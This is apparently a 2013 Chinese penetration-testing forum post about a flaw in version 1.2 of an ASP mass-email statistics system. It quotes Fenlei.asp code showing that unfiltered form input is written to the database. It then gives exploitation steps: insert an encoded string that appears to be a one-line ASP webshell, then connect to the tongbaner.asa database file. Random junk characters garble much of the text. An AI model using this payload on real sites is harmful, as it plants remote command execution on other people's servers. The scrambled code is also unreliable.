中国网络渗透测试联盟

标题: 铜板儿网邮件群发统计系统 v1.2 漏洞 [打印本页]
作者: admin    时间: 2013-3-14 20:14
标题: 铜板儿网邮件群发统计系统 v1.2 漏洞
'Fenlei.asp 6 N% {* c7 F/ B

* B( g5 [* M1 w9 e' O3 P+ d4 N5 c7 E* DIF Request.QueryString("Action")="del" Then * X0 x# c  w- v2 z
ID=Request.QueryString("ID")
/ K3 w' U8 S4 Q- O3 s: H1 ^IF Countss ("tui","Fenlei",ID )<>0 then 3 ^" {3 g8 o, s0 n% G( u  P- }
'略 + y! y6 W( Z& _% A, `; v$ t
IF Request.QueryString("Action")="Add" Then
$ K& |5 Y# a2 m0 B9 I' ]Tname=Request.Form("Typename") - o* r& p0 o& S5 y* u5 p8 Z& I+ F
Set Rs=Server.CreateObject("adodb.Recordset")
* V% a* }$ G% g4 @/ b: B+ _Sql="Select * From Fenlei Order by id Desc "
' C4 ?; ^$ f& d; p  ~: \Rs.Open Sql,Conn,1,3
! Z/ r( V  G0 k. H; C! ERs.Addnew : o$ n  q$ X8 [7 M1 Z
Rs("Typename")=Tname   D4 d: k& v( ]
'略 . c- [* G+ v5 E
Set Rs=Server.CreateObject("adodb.Recordset") 1 e& f- g% g% ~5 y& X) D9 s
Sql="Select * From Fenlei Order by id Desc " , h7 g* j" i7 s9 Q1 Z
Rs.Open Sql,Conn,1,1
2 w' S" N9 x9 I! p'略 - {6 \6 h, E, v& H6 d
%>
) Y, G9 v4 j' Y& B" e$ f
* U# b4 {: G2 V* S3 A; t * w' R: P4 M9 X  c1 v
- {6 ~; V& T8 \7 Y% @6 _
没有过滤,直接写入数据库。
( K" p7 F! d/ d5 D' `" f 8 G* e( Q: T6 t/ l
利用方法:1 T% l4 H/ s* }6 Q5 s. D
6 K) o5 r% r/ L+ n! A
插入:┼攠數畣整爠煥敵瑳∨≡┩>
0 J% p' v  r: C$ ~
+ M4 Z4 e5 ?8 x; k- q% t. E* ^   q4 x2 I% U0 t9 r+ \3 g0 c& |
连接: http://www.xxx.com/###tongbaner.asa
; ]" ?- k0 m% O3 r5 m' p'默认安装文件: 7 Z$ e6 ]1 L3 d& w0 w
'install.asp3 j1 m6 e7 ^  y1 S: L- h+ z0 O/ Z




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2